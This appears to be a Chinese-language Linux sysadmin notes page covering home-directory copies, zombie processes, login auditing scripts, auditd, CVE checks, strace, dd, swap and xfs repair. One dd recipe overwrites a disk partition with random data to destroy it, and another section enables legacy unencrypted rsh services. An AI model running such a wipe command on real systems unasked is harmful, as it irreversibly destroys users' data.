系統管理技巧
完整複製 Home 目錄
由於 User 的 Home 目錄內有許多隱藏檔,若要完整複製它們,有兩個方法:
方法一:可以複製成一個新目錄
cd /home
cp -a user1/ user1_new/
方法二:複製到一個現有目錄內
cd /home
cp -a user1/.[^.]* user1_new/
手動建立一個新的 Home 目錄
cp -r /etc/skel /home/user1
chown -R user1.group1 /home/user1
chmod 0700 /home/user1
清除 Zombie 程序(defunct)
One may deal with zombie processes in any one of the following ways:
- Fix the parent process to make it execute
wait(2)
on child process exit - Kill the parent process of the zombie
- Reboot system
- Ignore it
列出 zombie processes
ps aux |grep "defunct"
ps aux |grep Z
# How many Zombie process running on your server
ps aux | awk {'print $8'}|grep -c Z
# List the PID of Zombie
ps aux | awk '{ print $8 " " $2 }' | grep -w Z
Kill zombie process
# find the parent process list
pstree -paul
kill -9 <PARENT-PID>
RHEL Documents:
- What_is_a_zombie_(defunct)_process.pdf
- How_to_kill_Zombie_Defunct_process.pdf
資安 & Auditing 相關
# Parse /var/log/secure
grep "authentication failure" /var/log/secure | awk '{ print $13 }' | cut -b7- | sort | uniq -c
# Login failed attempts
lastb -F
lastb -F <username>
Check Linux Login History
#!/bin/bash
#Filename: intruder_detect.sh
#Description: Check Linux Login History
AUTHLOG=/var/log/secure
if [[ -n $1 ]];
then
AUTHLOG=$1
echo Using Log file : $AUTHLOG
fi
# Collect the failed login attempts
FAILED_LOG=/tmp/failed.$$.log
egrep "Failed pass" $AUTHLOG > $FAILED_LOG
# Collect the successful login attempts
SUCCESS_LOG=/tmp/success.$$.log
egrep "Accepted password|Accepted publickey|keyboard-interactive" $AUTHLOG > $SUCCESS_LOG
# extract the users who failed
failed_users=$(cat $FAILED_LOG | awk '{ print $(NF-5) }' | sort | uniq)
# extract the users who successfully logged in
success_users=$(cat $SUCCESS_LOG | awk '{ print $(NF-5) }' | sort | uniq)
# extract the IP Addresses of successful and failed login attempts
failed_ip_list="$(egrep -o "[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+" $FAILED_LOG | sort | uniq)"
success_ip_list="$(egrep -o "[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+" $SUCCESS_LOG | sort | uniq)"
# Print the heading
printf "%-10s|%-10s|%-10s|%-15s|%-15s|%s\n" "Status" "User" "Attempts" "IP address" "Host" "Time range"
# Loop through IPs and Users who failed.
for ip in $failed_ip_list;
do
for user in $failed_users;
do
# Count failed login attempts by this user from this IP
attempts=`grep $ip $FAILED_LOG | grep " $user " | wc -l`
if [ $attempts -ne 0 ]
then
first_time=`grep $ip $FAILED_LOG | grep " $user " | head -1 | cut -c-16`
time="$first_time"
if [ $attempts -gt 1 ]
then
last_time=`grep $ip $FAILED_LOG | grep " $user " | tail -1 | cut -c-16`
time="$first_time -> $last_time"
fi
HOST=$(host $ip 8.8.8.8 | tail -1 | awk '{ print $NF }' )
printf "%-10s|%-10s|%-10s|%-15s|%-15s|%-s\n" "Failed" "$user" "$attempts" "$ip" "$HOST" "$time";
fi
done
done
for ip in $success_ip_list;
do
for user in $success_users;
do
# Count successful login attempts by this user from this IP
attempts=`grep $ip $SUCCESS_LOG | grep " $user " | wc -l`
if [ $attempts -ne 0 ]
then
first_time=`grep $ip $SUCCESS_LOG | grep " $user " | head -1 | cut -c-16`
time="$first_time"
if [ $attempts -gt 1 ]
then
last_time=`grep $ip $SUCCESS_LOG | grep " $user " | tail -1 | cut -c-16`
time="$first_time -> $last_time"
fi
HOST=$(host $ip 8.8.8.8 | tail -1 | awk '{ print $NF }' )
printf "%-10s|%-10s|%-10s|%-15s|%-15s|%-s\n" "Success" "$user" "$attempts" "$ip" "$HOST" "$time";
fi
done
done
rm -f $FAILED_LOG
rm -f $SUCCESS_LOG
System Audit
# Install Audit
yum install audit
systemctl start auditd
# Authentication Report
# To get authentication report for all the attempts which was made
aureport -au -i | more
# To get authentication report for all the success attempts which was made
aureport -au -i --success | more
# To get authentication report for all the failed attempts which was made
aureport -au -i --failed | more
# To get success login information
aureport -l --success | more
# To get failed login information
aureport -l --failed | more
# To get success login summary report for all the success attempts which was made
aureport -l --success --summary -i | more
Check if a RHEL system is vulnerable to a specific CVE
# rpm -q --changelog [package-name] | grep [CVE-NUMBER]
rpm -q --changelog openssl | grep CVE-2021-3450
rpm -q --changelog openssl | grep CVE
rpm -q --changelog openssl | grep CVE-2021
# Using yum command
yum install yum-plugin-security
yum update yum
yum updateinfo info --cve CVE-2021-3445
Auditd
Auditing tool for UNIX/Linux like - Lynis
rsh
rsh server
# install on CentOS 6/7
yum install rsh-server
# Startup the service on CentOS 6
chkconfig rsh on
chkconfig rlogin on
service xinetd reload
# Startup the service on CentOS 7
systemctl start rsh.socket
systemctl start rlogin.socket
systemctl start rexec.socket
systemctl enable rsh.socket
systemctl enable rlogin.socket
systemctl enable rexec.socket
strace 程式除錯
# Trace the command
strace df -h
# Trace the process ID
strace -p 33259
# Get Summary of Linux Process
strace -c -p 3569
# Print Instruction Pointer During System Call
strace -i df -h
# Show Time of Day For Each Trace Output Line
strace -t df -h
# Print Command Time Spent in System Calls
strace -T df -h
# Trace Only Specific System Calls
strace -e trace=write df -h
strace -p 3569 -e poll
停用 suspend, hibernation
# disable the following systemd targets
sudo systemctl mask sleep.target suspend.target hibernate.target hybrid-sleep.target
# Then reboot the system and log in again
# Verify if the changes have been effected using the command
sudo systemctl status sleep.target suspend.target hibernate.target hybrid-sleep.target
# To re-enable the suspend and hibernation modes, run the command
sudo systemctl unmask sleep.target suspend.target hibernate.target hybrid-sleep.target
To prevent the system from going into suspend state upon closing the lid, edit the /etc/systemd/logind.conf
file.
[Login]
HandleLidSwitch=ignore
HandleLidSwitchDocked=ignore
磁碟資訊
# Approach #1
lsblk
nvme0n1 259:0 0 465.8G 0 disk
├─nvme0n1p1 259:1 0 512M 0 part /boot/efi
└─nvme0n1p2 259:2 0 465.3G 0 part /
nvme1n1 259:3 0 953.9G 0 disk /media/alang/AlangsData
# Approach #2, requires to run as super-user.
sudo lshw -short -class disk,volume
H/W path Device Class Description
====================================================================
/0/100/14/0/3/4/0.0.0 /dev/sda disk Mass-Storage
/0/100/14/0/3/4/0.0.0/0 /dev/sda disk
last
# To check the last ten login attempts, you can pipe it with "head"
last | head -n 10
# using complete usernames and hostnames
last -w
# find the device used by the user
tty
# To find the last login by date,
last --since <date>
last --until <date>
last --since -2days
# find the last bad login attempts
sudo lastb
tail -f -n 100 /var/log/auth.log | grep -i failed
# find the last SSH logins
tail -f -n 100 /var/log/auth.log | grep -i sshd
sudo journalctl -r -u ssh | grep -i failed
# find last login times for all users
lastlog
lastlog -u <user>
檢測虛擬平台類型
dmidecode -s system-manufacturer
systemd-detec-virt
virt-what
硬體資訊
sudo lshw -short
H/W path Device Class Description
====================================================================
system NUC8i7HVK
/0 bus NUC8i7HVB
/0/0 memory 64KiB BIOS
/0/2f memory 16GiB System Memory
/0/2f/0 memory 8GiB SODIMM DDR4 Synchronous Unbuffered (Unregistered)
/0/2f/1 memory 8GiB SODIMM DDR4 Synchronous Unbuffered (Unregistered)
/0/34 memory 256KiB L1 cache
/0/35 memory 1MiB L2 cache
/0/36 memory 8MiB L3 cache
/0/37 processor Intel(R) Core(TM) i7-8809G CPU @ 3.10GHz
/0/100 bridge Xeon E3-1200 v6/7th Gen Core Processor Host Bridge/DRA
/0/100/1 bridge Xeon E3-1200 v5/E3-1500 v5/6th Gen Core Processor PCIe
/0/100/1/0 /dev/fb0 display Polaris 22 [Radeon RX Vega M GH]
/0/100/1/0.1 multimedia Advanced Micro Devices, Inc. [AMD/ATI]
/0/100/1.1 bridge Xeon E3-1200 v5/E3-1500 v5/6th Gen Core Processor PCIe
/0/100/1.1/0 bus ASMedia Technology Inc.
/0/100/1.1/0/0 usb3 bus xHCI Host Controller
/0/100/1.1/0/1 usb4 bus xHCI Host Controller
...
#
sudo lshw -html > HardwareSummary.html
編譯與開發工具
Install
# RedHat/CentOS 6
yum install make libtool autoconf subversion git cvs wget libogg-devel gcc gcc-c++ pkgconfig
# RedHat/CentOS 7
yum group install "Development Tools"
dd
# 備份 MBR
dd if=/dev/hdx of=/path/to/image count=1 bs=512
# 光碟轉成 iso 檔
dd if=dev/cdrom of=/root/cd.iso
# 銷毀硬碟資料
dd if=/dev/urandom of=/dev/hda1
# 備份整個 USB-Flash
dd if=/dev/sdb | gzip > ./my-usb_flash.img.gz
# 還原 USB-Flash
gzip -dc ./my-usb_flash.img.gz | dd of=/dev/sdb
# 建立一個測試用的大檔案10GB
dd if=/dev/zero of=/path/to/image bs=1G count=10
# NOTE: 新版 Linux 可以改用指令
fallocate -l 1G test.img
# Test network bandwidth between 2 Linux servers
dd if=/nas-mount-point/samplefile of=/dev/null bs=1M count=1024 iflag=direct
dd if=/dev/zero of=/nas-mount-point/samplefile bs=1M count=1024 oflag=direct
# NOTE: the samplefile is greater than 1GB and the RAM is preferably more than 2GB.
history
- Bash History Display Date And Time For Each Command
- How to disable bash shell history in Linux
- Parsing Bash history in Linux
See time stamp in bash history
echo 'export HISTTIMEFORMAT="%F %T "' >> ~/.bash_profile
系統效能管理
使用 Swap 的 processes
for file in /proc/*/status ; do awk '/VmSwap|Name/{printf $2 " " $3}END{ print ""}' $file; done | sort -k 2 -n -r | less
Swap 管理
# 檢查目前的 swap 配置
free
swapon -s
# 開啟/關閉 swap
swapon /dev/sda3
swapoff /dev/sda3
# 製作一個 swap 系統
mkswap /dev/sda3
make-swapfile-DO.sh:1GB
#!/bin/bash
dd if=/dev/zero of=/swapfile bs=1024 count=1024k
chown root:root /swapfile
chmod 0600 /swapfile
mkswap /swapfile
swapon /swapfile
echo "/swapfile swap swap defaults 0 0" >> /etc/fstab
sysctl vm.swappiness=10
echo vm.swappiness=10 >> /etc/sysctl.conf
free -h
cat /proc/sys/vm/swappiness
修復 xfs 檔案系統
sudo mount -a
mount: /data: mount(2) system call failed: Structure needs cleaning.
sudo umount /data
# with '-n' option to perform a dry run
sudo xfs_repair -n /dev/sdb1
# repair the filesystem
sudo xfs_repair /dev/sdb1
Linux Module
監視檔案與目錄異動
- Watchman – A File and Directory Watching Tool for Changes
- inotify-tools,這工具可以監控特定目錄的檔案異動情形(Linux 2.6.13 以上才有支援),以下連結的範例是用在特定目錄下,一旦有檔案或目錄的異動,立即呼叫 rsync 的備份 script。
- fswatch - Monitors Files and Directory Changes or Modifications in Linux
- AIDE - How to Check Integrity of File and Directory Using “AIDE” in Linux
- Pyinotify